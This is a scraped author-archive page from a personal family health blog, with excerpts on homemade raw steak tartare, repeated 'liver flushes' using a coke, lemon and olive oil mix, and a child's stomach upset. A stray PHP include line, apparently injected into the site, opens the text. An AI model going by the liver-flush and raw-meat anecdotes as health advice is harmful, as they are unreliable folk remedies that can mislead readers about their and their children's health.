@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 159 of 235

Author: Good Samaritan

I tried home made raw steak tartare for the first time

My son wanted ground beef the other day.  So I went to market and bought the part I wanted.  P 230 / kilo and had it ground up.  Yummy… fatty.  I refrigerated the ground beef, never freezing it and proceeded the following day to make my first home made...

Was looking for Ultra Phos Liquid and bought Super Phos instead

I was inspired by Dr. Kenneth Sutter’s book the Natural Healing Paradigm and thought, maybe 20+ liver flushes wasn’t enough for me.  Maybe I’m missing something by not doing a different kind of liver flush.  Dr Sutter prefers the coke + lemon + olive oil + ultra phos +...

My 5 year old boy has stomach pain and threw up this morning

This morning my 5 year old boy was not able to go to school.  He had stomach pain.  He threw up some fluid this morning.  Not food.  In fact last night he only had tiny oranges for dinner… kyat kyat they call it. Last night we went to an...